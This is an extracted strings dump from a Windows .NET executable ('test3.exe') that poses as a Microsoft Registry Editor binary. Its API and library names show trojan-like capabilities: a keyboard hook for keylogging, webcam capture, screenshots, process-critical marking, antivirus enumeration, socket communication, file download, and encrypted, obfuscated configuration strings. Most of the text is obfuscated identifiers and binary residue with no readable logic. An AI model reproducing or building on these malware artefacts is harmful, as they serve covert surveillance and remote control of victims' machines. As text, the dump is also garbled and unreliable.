!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
7PkpbD8oE0
o6bdRqB2L0
HkmRwXokMVlQEoQ47hQ73Gf8RN0
kX4HK8bbP0
mmwnTBEBU0
Db8jErstFA500X1hExTxyIYQZU0
FsgwiQgXY0
gozmzSssq0
LgI4rPoKBp6DJQDcTgciXfFkQx0
1YXNt96r17kTvtju13I2rRnDhyHRJOCeXRMkr35CS6LA65zVsMF2QjRSVCJIMoog6RFsFRR9r2LIXU43E6iy0
C4aAbXG7vPT6jENrj2YwsLjif01
Jbb5YjCcWIvsDmfrrLIkq7sDB41
UHpshRS1L1
hQo9q8BtW1
1spWqIDHZ1
_Closure$__1
IEnumerable`1
ThreadSafeObjectProvider`1
List`1
C2cPmQh7a1
O2j7ppRXl1
ni1ey0HbyKWXGTYIJAK9yiVEVp1
LzzJ21ndr1
cNRnqi3Ow1
Microsoft.Win32
UInt32
ReadInt32
ToInt32
icvXhUuX72
ygbLLFxmE2
BvZdF60i6Xg5eIoIYQssFyJ7HYGSBJ8IlNW1wHrcpXHloz1otFUAQfzhIqXI1vzND2IXs7UsVjlySh87kphO2
Func`2
Pbt3kpuTy2
vziS8gDSAwBHE9XquIPifrcHQz2
JjgMgNYFPwoVKpnc3G7eyrL3WN3
Pw3yyxqvU3
yHbu1ii0uAuEWCI2yL9YwheKaX3
syOw6Fco9dtIKGE1TjvN1ITSGg3
4TwLQAhls3
UInt64
FEsNcdPnB4
bWSb2pV5E4
y2a1nHzO3AeUeib18tJuyqPnD1vtPAwV0BQ8STXfR2aXQMRcdlbZqSBdm2HcDnRpoqaO8307bpUJBvNEnmvF4
ERzD5HedO4
65dOeD555ePyX8FZGg8kLZHTCDMhokzzsptauroism8ScAFk8OQS0WzKTs1LveNc6gRVkePV1yCaxbe2HRgf4
ZAe9lTlOSvVOxbJJi48G5OQJWg4
OZ7oXQtgVuxk9puprMDuHasd3j4
01Zn3pDew4
Z93JwA3gVSnLfQ3ckA7YPWbdYI5
bhgn85srX5
yQZd7dis06
uroWS2BvZJThWI4utM7qKsfepizkYgYIpP5HcAHrnGubG0W45Xduy4O5On3jraDS3Km9ylZtvwlW3MlcH5656
zwmVJA1UYWVoEL8tSk1Y662YpM6
B9ZduVs4W6
Wc8VADIWt6
788wFfRKQzV5gQm1OloklHgP6Y3AHr18cL5k4D8zBSzFBsHWl8Xwj8g1z3mYhEmYlnIk6ATTt5bUgfCdED827
op0IK3gW77
oMCjCXTd87
qpE4sTsVE7
QklVh33WE7
Ft9DXrX8ejITgVaMm81OIxfEFr7
MmIk5fNKw7
bBX9b4cVVWWgMTwlh7lfcUkUk9jiow2iCYYV0mxDaWU5LnHbWEemwR6vzViU9Lx0FRDAkedPCl4vHpuBhj508
CBpWPpxd28
yrzIBktcoIlLxqFccyUFY5BQh78
SYRMZN3m98
aZC8stHFC8
get_UTF8
7HBXIOCpP8
Hp4e2FXRMWZcMjHSsSwfIXNcBU8
I9hqC0TBNy0UzBsJNfclByAvQX8
_Lambda$__8
4mQ2DcGkxomV4LLmjvRFV0eP4b8
XUPRWV0jgWNAnLfMz7UvlsNNax8
4yIPo5LXz1TvGp9Lt3t261flF09
0JDeC4KK29
KhMhsDi3sWViHpd0yvvRnDsg58YD8728jHoIbj7Gbbi7iYikBHrkN4lLJsFxdoQ04vGEBfpNWB2Payd0jtUB9
BuMCDP5AkIaipVYttx29aYdzvQRvaohKNrJb6Xx2SYtutraBSRL87ruyRCbOggSe4EuLZIzVC1DRqtytipJE9
LqwARCoYE9
PrNAOju5X9
4MuvbZPYKhDRdkm3aRoVg3uBgpK2Cx5mwAXsgKCuAqQ9QRvpG7YrhI9ThSeT94x6Trk6mYcnlb4MS9N22wMc9
<Module>
iTBbUPgo4A
Y3iWwWxbCA
capGetDriverDescriptionA
MbiMgm46IE3zwOPUwOEAHvGaL2AqCkRpZk8vOfxWF6CgKnLQjnD6dcgjuWlk1RqjySMZafs9lbTwaQ0MSZbqA
capCreateCaptureWindowA
hy4TMcuK1B
rM31Q4Jk1B
v4FU0H1C9B
KEoUMMhmnfPSl1KGfw8c0whKTAB
wfmUveDyBB
gQ2vG1QkEB
l2KCvqeIJB
LXQiKWASaiJVlY0rTd7MJ0olfyLymIxmXWgEP1lF3D4KPxuERDVPHxPNVO6RC8899RWgZKNSGiW0PQXxKbrqB
HAxFpVNayB
wS5hm7vu4C
MlbVsmb7M3BUx0rGf8sQQks8nCC
r6brWY2MHC
PhpAJD7201HVLp3MHkAKwFIiHBSYbjbrsyMpdcbDXu7vbcH0GMHhaCMUvnXWKRZWIxCaqAv8dBXcJgpbh86MC
HENM9IHBSC
5D9376vVepTKiiWbGxya2vkj5TC
SxwG2IABUC
yeP3HSxrU3SfScMMMUBvKWKH6jC
J1rNDoFopC
kE9dEhNDvC
unJJ1NrX1D
JEM8Qhp7x06qgqHhayWdocRLia7W052gevDBPcQkyF2RdYsS61KXbEXSV76bfOsspLoshEMB0Xhss2PXOeI2D
8BM9A45neWQZs7piOzFW4gPasAD
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
Hnrn2Y4gRaG365klpb83OTMnmLeQFgi3HJ4lGDJdotMBjcfO1NxiqZGylRYtw9p5oVd6EQVSwkHWpvrYqm9KD
lIq0NdjdN5ofc4fsbHfh4K4VQKD
wFPtHRlZPD
MapHSQHYmDVautidmD2RAOGWmSD
BIEhupgjiD
RwkJZle5koKOhPzqYp6MqWWmkiD
53PmHaHssD
MbudW44UuD
p2GelqLBxD
AsZREIGXWjh7dZlQGiN7ngVy6ME
EXECUTION_STATE
T7z2gpzxQI3mU3Qra6RSDQXGOlLkXrVhrLOPkyVsgFES4y1Xy5xUTFVy9gLsR9OzgsG7GCynf995WMIjwgSTE
j7kOYyWnYE
QRDwbj3weE
Fl4mnmcanE
EDh2NsAHrE
x9w3C3suWHfS5XB9NqBjTidY26F
wp4i1zGr8F
1MoOOQbo2v7f6dY2y0jB9kRuxU2P6wETqg5zzNuDZLzOf0l3gnOgmHd4V2vRM1AVA1hiQVlgtdr6rDSnnxWRF
yNWEp5yIZUWkS7LI8ggGSh5egUF
9eW6yKNcFVxN1DqUy7eE2UWuKNSsCfdxKF1eUyXSMDygh2kuaHindqhSw2sUB67zpW0jceBN2RaTvje3pYiWF
zNjokFc4fF
BusAzTGWwlnGCVcyAHyuYzAhbgF
TdUFLiTHeHXwIZNelUn7U3nwEqF
NI3qC5Og2G
Ylx2V6cIjv6QOLtgHQtyy1L8m2G
KbcBt2KvGG
msGwZGk3Wb4DuyBPE6oMH25tTNG
9NxsCBzkRG
nGUHFnDnaG
w1sg6gDdV7fQzjqclxWeNxCzuGi8hr7grW4pXqYOqm9I8zIegTnTKNL1J4sHxgF3PnNAy5uuA959dU72N8qdG
ihTvoXaMeG
XPDIFLVApG
ODf9x3BztG
KZzmREgiuG
jtBTmjv36Q4BhKKFPPBpr6X7b7H
1S6Q76Rh7H
YIyKKHyH5Lbk4CKfW9nr19M8bO9jbONvZSsANyjgo2uYp0S6TdWwR9ijRIL3WNmUOhqi9u9OhR1re5rYe5ECH
UOahNDono7YkrOSI08uHHHmCJzf3M0rRno6vfcRADGdovqvizcAq8wk0eWcmECFMhANUUYYlQwgp3iSLTeMPH
5sAIuJqefH
n7iLDO4ednrsvWPOrQfYbKNRQlYO0HXvJn4n1FCPXR5HMoxPMBCDxuesB3CxYjvrPvyIpN6TbYSIuzNPEplkH
J7EnWtyhzH
igsyiDd46I
get_ASCII
EU9xnfCbmI
LJNjMyHAqI
ZLn6GwybAJ
3sAVOoYYGJ
jhvVZto5QJ
J5P8thSHYhlGMYkQHw6CpwnmSaJ
PJfEoMKN2K
FvZEOb6m9K
52CW8D1uFK
I4uG1Lb1Uvmhk473uPGASO2tKGK
2z5dvem2rp96LpIUWYvxp2hJkA5J2j0B9DzfKB06IGD5msEt41zg71VDVkMKXajZNSRtp2Jc33k4wKPZ5ziPK
NaGvQw6zxuEgolMWKEL1kz86duPhKujcnrTTV08jJYuVcZ3wlUJO5L3VcrAGe2BJhmRe9GiJJE9PjSBo2zeaK
kiTH06x8HTrUtMkV9PFfK8Nc6roYrZL9ho6SJsJorRDedwb5sWK0md4Yu9aHeLRN7c97j6FesO3pj9QHHFWvK
QkMPIgL10L
Mgcae2UZT1njWUrUpFIbRHQzeOL
0IZ9pJSzlkxxn0JpG1I04iP1OkL
9t4kabVxxL
wWwBFbICzL
WJg77kFbIM
kFfHF7CDxwPxeDrKWYJ4DLHq8JM
8M8JDQYyJM
KKnfFncMUfRCBE2Ds7But1Y9jKM
JJkBdsQkbM
fipxm53fgM
z8TXoY6NkM
tZBA8XdXsM
Ubeba6JBuM
PQt7i6alBN
aRGOp88BCN
Py4MftV3JN
rfHtx7VcQSkfaG6AnWr2ukzEIzztzpsvYiOvCaNgm0gRHBA3QWiTKp1oiCdc6h2Fri9DaAO001xFLUIsQlPJN
RUXwyjdkWmEQkc5C8I3UpYkvhJN
yxRO8NvAkN
UmFChUiaoN
nvzvJlI49IyxOiTp0Wo5N3uLhoN
8v1AffvoNmXozhnHzReCg3yl2KN4rU0XKcgCfGODqMGMU9PQGCjaduygMujQUAgzPjI4WZbt43ettxxwJoorN
cNliY8b30O
yTdkBxkA1O
4Cg28vvD7O
LASTINPUTINFO
System.IO
yL2vweMXTO
XuzGcTmhw9agQmuM88yZDMJxxTO
7LEaPXsuvO
yjktr0JlAP
A5LaoR28QP
ksMlm5JmpP
NDnfzI3kqj1MzQ7TntEZD1E6luP
5kb3CqmImeU1xQrJU1OQWYfDcyP
G0GThLy3zP
6Atf91jM6P1VHn2cshpT5gduF6Q
u4H9LzQvWQ
GWtNhmpJhQ
YHANnAmoTGQvc9Ml7ITB5eNFHlQ
8kjwhcR3yQ
xVpyTFjmSllsYjJyHVrLygqa5BR
WJ8sOAz2PR
vbfVbNs2M4oUWdfJHhWWGSFayPR
UAWOHNb2TR
Dx5xDpZFvR
W0qXLQ7nBS
ES_CONTINUOUS
Wvcwu4LjVS
nGVRCd0kMAhqA6omqh8w2KSmzbS
qKK0ZrleffYHTMC2kP0Id8QGfh1DIIalRy01nNNwP9odzY1UarQW4Tg0pHtNS5bhhwJ6c6cgk9ix6h23ZdzdS
dhdOpNoHwS
Fiqjif2wDT
hCEl7DWJDMP4EQK2bgDF4lu2AQT
NzDuDUzhvT
SETHjquUDjOsuPgGr0ZoZeYPeFwicY0cSbUh8bVmOYEsbgCJDTotHpsamc30FDWoIgLNUkKERPH3JqLtteKyT
iJUsMOGC3LaWq8SWy2Vfq1wGADU
aUN6Gi1HFU
rkXZnjrKGU
DXu1DVPYRU
j5GIDt0ivSnrSRapfXRTbbcjaPsiFrgNOopuH3IvSclNstGVOXbIPVGD25UUY2kpRe2ZCW7TbXPNTzFuJ1DYU
vyaSfcbHytSoRsWipDmUYj8CKcU
7rKTGYUoiU
00Tf3BQVtU
GXuBaG2QuU
jKSWnIv04V
YbOV9UsKAV
h4z74gNxaV
GQU8Sv94Kf2RET4NQWZeSmBT5pV
j08qAqwbsV
e6lzIqeewV
3gPqRs7DCW
AmgvOVNsJW
2E4N0lcrDk1uPzMBbPMLNUcQTBtAlnk4K5ZUOEDzgpMPrcEBwbAdPkt6olZ3uAa243QqkBd4hNxd3iXUH0gaW
OnDhYgVWoW
p2BBM9GY8yqmLgmD6JTHvbAIWvW
JJ0Pm0Jhpd0zNMewG7ihUiTRmDX
900vnm17LX
bLpcXr1uOX
ndz1FPxkPX
R8Y4WaAcUX
UyS9PWkqi3fAzQF33o3RfmUQMaX
l5mMKSS3vpcLMHpKmsP61rKnjtX
34fvc1TKnlQ9oxlREaEpCfAjn4Y
gbPanxqH6Y
ryD7xcxw7Y
frZHLmP3DY
mepF4gMBMY
TAYdqVbyoY
L58MGbcdtY
ptTgtDGwI8chRcMmR2TEjCgWgtY
TJnkczGimsXxRPZNKaeCqtZVZuaRozlwgerUXwqJ6wmLdJHyKzlagPTqBq695fHn9UyRYXK7McvSOImb7cdzY
tspGS4rL8bgP9Rbo7SUGFWMktGZ
wTlhQzLvGZ
lwmr45fdPZ
3geOId3MiaEtGcHhUWGAfsfTUMjdfJHJVP9DgCOXvotUNhpo1DHeJtoW7vFz8W8Wu7ctViEsUjl2d3c8ZdvQZ
HLngaFL5RZ
vurgREqgjZ
PJy0314yrZ
Dispose__Instance__
Create__Instance__
value__
bhRyq09O8a
AlyuXiLgLa
qaiu21Km5PQqouCMERiOs3bNFOa
8YiR92kYOa
FTOHRhs9Im48142eW4FxtCnWHRa
ux4EP7E0O3wSciOYAuiqfFL5tZa
bjMY1zj0ga
19nsq3bDia
O3HY3LyIL5F0RnDHycpsqkHFRla
ProjectData
pV5pCUWR0AS1lZJAmK8d1qXIPua
PUx7pPP76b
86UzdXtK7b
BUMuvZ60Bb
lowydYy3w7PY8UzBLrGnfPvBGIb
PeXWxAYFfb
O8DsMjq8gb
mscorlib
K5Qkjy0CHSGKcDhrwbf7aQAU3kb
WMjTBK2lkb
XC0k2AIZnb
OMDcolLBcu4Hac5DXRbnF8nE9wb
mdKUM6JKwb
wGv1DdBUIAkkXDSgW2oHULKAdyb
J9Nxz8UpVz0IBlBdGpBIwdwmONQfaAgvvZOhckKqNu7wnp5oH6fms7gDhXbiZParalYsoDWX8mYEScp2wYi0c
9ymlD4GyUbrlcewSh95liJAF89c
JzPIG3R2GekqJg2zzoIDisdno9c
EL2RfIDfJc
is1V5fgaLc
CCqoOBOnZc
ecQCp8m3ac
System.Collections.Generic
Microsoft.VisualBasic
LowLevelKeyboardProc
4fXqwiT4l2zwlEuUQFvdrv5M4urKroWqVGUCT9v2ywkddcx0Pq5KTPoItaWnc3wAwZaDXAwoBZaqISsBNwssc
J4J5bDLQo6Ryf48gwThlWczYOtc
hRcOKP5Uvc
gSPQtA4B3d
GetWindowThreadProcessId
GetProcessById
dEz73Zo1okAKnN647AfPmPNJbKd
MEN07xtqSd
RuX0sE8nBY2BY3YQC96sK3YiNYd
VYtnSndZYd
bJuhpmevYd
Thread
iHQBgqhYLope3Spdgymljxno0dd
RijndaelManaged
get_Elapsed
UYkruP2p9hgsalyTBmy283Ilohd
Uc4LxxwQN7dNfNWveaLFfLf6xid
zkp0JIfTld
0fO0UJPUmd
EndSend
BeginSend
Append
RegistryValueKind
set_Method
CompareMethod
TargetMethod
achFSe8Otd
lFgwZyadm4XAkDfeUJNhlRB9Zvd
dl0bpxqE6e
ZUOHvLCxaPXctuZIdPNLJOkHeCe
LO9AcwBNQe
AB541sW5Se
NxOrwxHokMpLW7Djrx3UwiA0eBvDkdDQO5gehfui2pyWyTDeJJw92SnwhBRtuLU5vWcK1CCpc1ERYJh25ogYe
Replace
IsNullOrWhiteSpace
CreateInstance
get_GetInstance
instance
GetHashCode
set_Mode
EnterDebugMode
CompressionMode
CipherMode
SelectMode
FromImage
DrawImage
get_Message
u0IypcWNke
EndInvoke
BeginInvoke
Enumerable
IDisposable
Double
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
EventWaitHandle
Rectangle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
AppWinStyle
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_UserName
get_ProcessName
CheckHostName
DateTime
get_LastWriteTime
dwTime
WaitOne
WriteLine
get_NewLine
Combine
ChangeType
UriHostNameType
CheckForSyncLockOnValueType
SecurityProtocolType
GetType
SocketType
System.Core
MethodBase
ApplicationBase
HttpWebResponse
GetResponse
Dispose
Create
MulticastDelegate
DelegateAsyncState
GetKeyboardState
EditorBrowsableState
SetThreadExecutionState
GetKeyState
ThreadStaticAttribute
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
HelpKeywordAttribute
GeneratedCodeAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
HideModuleNameAttribute
DebuggerStepThroughAttribute
AssemblyTrademarkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
MyGroupCollectionAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
DebuggerDisplayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
WriteByte
m_ThreadStaticValue
GetObjectValue
GetValue
SetValue
set_Expect100Continue
EndReceive
BeginReceive
Remove
test3.exe
cbSize
get_TotalSize
set_SendBufferSize
set_ReceiveBufferSize
7AvHILCiMrvlpfdxajhkO6E9M1f
bXkK1d1tBf
NOyzjwcniVd4hBWmND3OMmUZUGf
SizeOf
ldFPFddKXf
J8Tziq0cXf
ixuxCeRaehWmczzo6cTLOgCrSUula88Z8AuqjjZdEwCtYfAkLYZtkW13Qrh3HyhaT7SXWVZ94jgugki8JdFYf
16kiGmmsk83k7vfyOy83QLFoq6g
gMdJ6WbxMg
TrcNurjPvibXLtmXjaqvvSiKQAPmUOiRkztYV72K1hyHAeXzWU256y8qCcLAa7RKkindEtplEfR8pqCTOOQOg
k0ZTZWfZag
get_Jpeg
System.Threading
add_SessionEnding
NewLateBinding
Encoding
System.Drawing.Imaging
FromBase64String
ToBase64String
CompareString
ToString
GetString
Substring
System.Drawing
ToLong
set_ErrorDialog
Tr1DrgI6tg
1uBjlS8Rwg
U7qkdiHpKh
Iv3PTX3SNh
q6CpCHdoOh
Z1FtN5qBWh
Yv5NkyjPeleFOuCTYvjmFhS1tch
Stopwatch
i4r9tmVVjh
yiEljnaAlh
ComputeHash
cIZ2Lu9esh
86rShaFVn3L3rMVpjaqTdjtdush
get_ExecutablePath
GetTempPath
get_StartupPath
GetFolderPath
get_Width
get_Length
EndsWith
StartsWith
PrvImV2Owh
0eZB9jZGDi
igNtt35Xitg2vBS0TzZ7sWlVPIi
pDPpvpJ0Qi
Bgptvz0W7Zd8pHPY9HtvAjRwDKTyiG2vdvmioIu6DYlSEwqTOFuD3GrPRjoqb9W5OBe1RA2Fpmu1jc0sTllSi
1spO87EKS34tpWNLwKlLRUZ0gei
6vXAIwmdki
O6btDYK6li
X7hBo0Axn8HhtNn1V9Hwvn1ulli
v2FhClofHj
zkP3jPdjPj
uMPnAgjDRj
g5agOTBdciaiM9jqixepOC3WdTj
5niuM3dX5k3hpqUDJDUWEJ4dogj
pjdwPhF0FtWTtTe947inerQ6GelR9rsGB5OD7PQdAWme6fIiHm5etsrebI7Vr08Bl769W6nwUr5QiIIiOzg1k
M80eg9uc3k
0p2H0RXqGw2Aju9PEtebjtfCmhI5Y3O1BQEXc9rRrQrGVLuNX6j6U1aIi1o7fCcS5bWFDaLjIgZOnnKPkLLEk
9cBxHIdvWk
HoENwjaNbk
get_ServicePack
AsyncCallback
DelegateCallback
TimerCallback
RegistryKeyPermissionCheck
TransformFinalBlock
RsWt4bVgnk
cth4fs37ok
wOFvo52Cpk
lsvGcYHS03tELmeFgqsqXx0Jvyk
xOi8VeT03l
6anJNqrZGu8E1Zp0L0IPPMnUZDxyVK9dnGZ1pncwhLXMwcYmD8Pa4n8gCvSqpo4t4Q3zdyHqUUUVDGerS156l
RxtaUtAO7l
vGFOa9q2SqEu6nUCebKFrybkeym2k4gpaQcfuec30mA7pEBaNxkN34zsqjg8eNouM0NaLEk0Dyv6BtilWDyCl
AO5ZzB0kEl
ois9VVIxFl
dZbcE4xKWl
RtlSetProcessIsCritical
Marshal
System.Security.Principal
WindowsPrincipal
ConditionalCompareObjectEqual
System.ComponentModel
yFBxJCeqS0iwuimMREPT88V9Bil
c6kh9qUzil
LateCall
kernel32.dll
avicap32.dll
user32.dll
SHCore.dll
NTdll.dll
set_SecurityProtocol
ObjectFlowControl
wgdz5I7jfxdl5FOk0HIVgEOki9m
oCmGyaKePm
GZipStream
MemoryStream
lParam
wParam
get_Item
get_Is64BitOperatingSystem
azp8Mr3Arm8pgdTDlCFaEnP0Ofm
SymmetricAlgorithm
HashAlgorithm
wKuf5SMCmm
mOa7FjN5nm
Random
ICryptoTransform
7kHT3Dz7KDprY7FHWr4FIaJtcXglPNF4TerJQiIa9PFzZbauXooEmEre0RBiMxXyoLW9AGG4BdVKwFZKofywm
kI2YhLAV1n
g5DmeQ238n
0rmZTPUdXgChxQ5HDt27zZsS6DVvmKGpDCMuQ4XGG4SRMfbQqPLgCS6Cijtq77HA3J7I0WYv99qftN4hJVMEn
vW7Tc2Fcr866GL110kQwLYsDSEn
pq42c7utFn
ibGvoyQtTn
J5MQVMjFXn
7vncC1Zean
ToBoolean
op_GreaterThan
TimeSpan
u57AGRzXdn
CopyFromScreen
get_PrimaryScreen
System.ComponentModel.Design
AppDomain
get_CurrentDomain
OTbIMX1ejn
get_OSVersion
Conversion
System.IO.Compression
Application
CopyPixelOperation
Interaction
System.Reflection
ManagementObjectCollection
Exception
Environ
uWiOHNZQeQf3UjE7nl8KzcTsyrn
EeopX5wVwn
SocketShutdown
Pij9XPrqzn
yyIFpD4J7o
0lUVj37T8o
ReSUnCi41sj7kV5cbLwcCoqFDAo
get_Info
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ParameterInfo
ComputerInfo
ProcessStartInfo
GetLastInputInfo
Q609kZ3cqo
3O72WXnHhWKi2YIL3eXVYe4iRro
EmgviP5tO8EXDhmZJ65y2sIj55p
pzZHnIoJ6p
ayPF0HUkFp
ccxZTBzt1TY7KpKd9WyBOlj2cIp
pan63qAcOp
1bL0LfZ0Qp
Bitmap
fDvF8Ox4cp
xjk1zSA6rp
hzvVjpKd6aGehw8qNvIbPAvYmEq
YVBtVObfHq
lblIl9WF9UCW9D9JNLvMTFBkBNyto8UIvnek2dEio92sxk7MOS8GwHF7OkYwviQrDUmLZwIQLxVVJupLiHjJq
x1FlvmvApDAjM6r1NXPZuNtttTq
System.Linq
QBCUJQceZ9qBXA0hjDfOgcuDTR2WtPQeoaJOZMhWAsCXMHy8kXu54es0f5KEFtSO08c1SiEXChd2tQxx5WKoq
DXAZz1eboq
ZxyxyJX9yq
eokHEF2v9r
c0azRTseO8jrD1ngUNTsETIj5Br
DTc4bLYIQhtD357lehHbZy8L5Gr
MD5CryptoServiceProvider
StringBuilder
SpecialFolder
ServicePointManager
ToUInteger
ToInteger
ManagementObjectSearcher
SessionEndingEventHandler
System.CodeDom.Compiler
ToUpper
get_CurrentUser
StreamWriter
TextWriter
BitConverter
ServerComputer
ToLower
2w0j5ygdHY47knrSm5hxHeh1Hnr
ClearProjectError
SetProjectError
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
mX8NmZJczr
oJIUzG8Co79v8pENiqDm7ttMGy4SpBe9V0B936iprAIeJuWgK4ycJY2ylDMOisFNEuHm8D4gJLTjPdBkYs3Ns
8veMnF0ZSs
JBJGAlfj4DEylP4feTmOoxfluXs
Graphics
System.Diagnostics
FromSeconds
get_Bounds
GetMethods
Microsoft.VisualBasic.Devices
MyWebServices
Microsoft.VisualBasic.ApplicationServices
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
Microsoft.VisualBasic.MyServices
GetTypes
GetProcesses
GetHostAddresses
WriteAllBytes
GetBytes
SocketFlags
Strings
SessionEndingEventArgs
aznSiwTH8U2pyAhPS6m8BuqkSjs
Equals
System.Windows.Forms
Contains
Conversions
get_Chars
RuntimeHelpers
GetParameters
Operators
aaP9nnM7ss
GetCurrentProcess
SetProcessDpiAwareness
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
BjWuU6ocxs
3dZhDbqZEoQlzHBveuGKNhWqJkVU4T1Ly9ilHH0uwjQonNYKIjHMcDZi9BXXUrY3oFP4F1TkaiS2ioR7BNuLt
YBJBGiNfOt
pcRTJoIdnsSne0dT0RzBvibnpVt
6ael07fYeEiRBeitKaP97VS8WYt
Concat
ImageFormat
PixelFormat
hBtbN2Wp73ckS9nM6hSGryu90bt
ManagementBaseObject
ConcatenateObject
SubtractObject
TargetObject
ManagementObject
Collect
Connect
set_AllowAutoRedirect
LateGet
System.Net
Socket
get_Height
op_Explicit
set_DefaultConnectionLimit
GraphicsUnit
B27I9KQllt
IAsyncResult
DelegateAsyncResult
set_UserAgent
WebClient
System.Management
Environment
get_Current
GetCurrent
ManualResetEvent
get_EntryPoint
get_TickCount
get_ProcessorCount
GetPathRoot
iGzG20rNrt
ParameterizedThreadStart
Restart
Convert
$VB$Local_Port
HttpWebRequest
$VB$Local_Host
wA2UuvWwVXzvUVdlNNDnrVg5utt
zOQLpqFcmiPi2JSG3UxYZ9jQmut
set_Timeout
GetKeyboardLayout
MoveNext
System.Text
ReadAllText
WriteAllText
GetWindowText
JBxo8Bgl0u
NZURKfzxCu
DPaIWkcBFu
91IdKKteFu
CI0tAlb1Gu
3e6tjSD5Gu
rma7mug8Mu
UmuSLFQ6QDfA6LZI7G4COvjl7S1IOIwX24sZf5pC7o77aWmXliuEup17uc10bu7QjYi71j5kjoCcBJe8rBoQu
MqNAW41hdu
1y8d1SOUou
PXyiRqYmOMJEleD4OzjEuB1Gf1v
GDLNzEanYgd9E16Kv8gusBN4g8v
z8uTiWiZLv
4SVq6AFwVv
VioARcYiXv
owD1GMrpbv
3RocZlrAcv
3VxrGXHmtv
oTLEjunPd2j16etzNq3jsQDMS4w
kQqS5P9G5w
t8NdcO6jEmtiEx3ygFZgNsgWG9w
7xBmJrv9aQbZfKM3Vdrbt9QrI9w
nBHjbBW6Fw
UU7gdbsXHw
jZtKKQrCzqeOiBFRFYy98lqFsJw
fo21xztBTw
4IOzGwspXsgVhXme6pB0sc64Hmw
mGmtE6xH69JorqDZ2C3ZTVoHQow
GetForegroundWindow
set_CreateNoWindow
6W1lgEjsAx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
p89XaalsqaZ52NV3z0PmMhdRGHx
nNGdEUUCjx
x4efWehXsFceF7TilchRZ9sUpkx
NciRbNg02y
gfkqyA45tACQMV3Qa8Tu4dCfbAy
ToArray
set_Key
CreateSubKey
DeleteSubKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
ObjectQuery
get_TotalPhysicalMemory
get_SystemDirectory
get_Registry
op_Equality
WindowsIdentity
IsNullOrEmpty
RegistryProxy
4CM7eSkJ1z
NvTIegNUSAEXYBKNvtKCtY1GJ7z
RX58Lf55Ez
PMvBdTRmFz
5uhBJkIuLJtAbZkkO7Y3DlMPyNz
26xafcWvjZ52Qy5DXr4BLuzVnTz
4YuIN0R8wxncJ0rjn8lklENRKnwwf5PHTyVqClk6aLYTyGRGwqFkBL3rtyiIecIywT48IRbblcZ7dGpxQmfbz
SSZ4FSqegz
jf9HnJ87iTejofeAPmZKayD6Lpz
gbh3PcvYtz
UCxlValyabInJZwzq0rB9KTPnxz
&Microsoft
Windows
Operating System
Microsoft Corporation. All rights reserved.
Registry Editor
Microsoft Corporation
WrapNonExceptionThrows
$cc0966f5-da34-43be-84fb-49af7843d291
6.2.17763.1697
MyTemplate
14.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
_CorExeMain
mscoree.dll
cIDATx
"]|NLb
Fqb ygt
'k-7=s
&4/&ro
#vn,ua
E,6]r)F
Cb#Fz}c
hEdGXX
{voGve
\cY"'
^,~)I
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
ge6fUIwjSE
5GsI3AhRTI
fujghKplvE
oQz05dteuq
wBRvhxxKDg
TckGknOG4S
PpVYxBV3oE
5jK2+nZDe5L88sqQLJgTcw==
G4C8ndfHm1CcS5NS4ltPfA==
zpDUMtddH5nJo49Y9lpp0A==
CR0t/lHu7RNBT4DRokoHHg==
A/rDS7/bsiDDtgwKRq5l9Q==
jvjmAZdA73h9xxwQWaIWyg==
KRAiFc4xL2JwHk8x
\Log.tmp
dwjHqQNQaq
ruk8WM2fBp
MCulHkCnGM
fA6fjPckA0
SBuT0nlemr
ZnQAMZ069s
DIvpUGM3r2
Microsoft
Service Pack
dd/MM/yyy
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
SELECT * FROM Win32_VideoController
Win32_Processor.deviceid="CPU0"
Core(TM)
WTHIsfKHmm
R76YvAFnFpS02pewxgSJih5hdaoYoACxDiD9vYjSmLmW9yL29QfGGcxtCtkF9Ia2SiN5D5SJt0wyxTlrWyQaC
WETcLjhQ2zTmUruf3fWS4C78nlQqBuUGpIArX0iPCFAN9po0CXj9b7No1QinRJUqy9X5SAHCFU7IUUw82mUMt
3aYX0nOvA0zrve6MjMmUgo6tKKns6vqKDkvGSaAAowHLVTNemDT7VHY2mO5q6H7kiMzzz2plkNYOiyYhu1mA5
7xj809qjIw4Zfb9tSiqE6shOACG7goqF8gUET3ugoCi7TmH5w56U023whfsaLckaQmaMRyeBPeEmgWMlooflG
JrUG3xhLF5Sm0GrOpiynOC1ArTewTwHCPhxwubx9PscQQ8kGD8HQwE14k02xioq8YQp3wTzNOquYcgIacgyYo
KGzVFcHqf9FegQotOUKbQIjuLAvUSYjUTA9eH6Teywzk4YcRXH2jWZADbmtLHzzxDK0nu9bVLxXovreq7CSIB
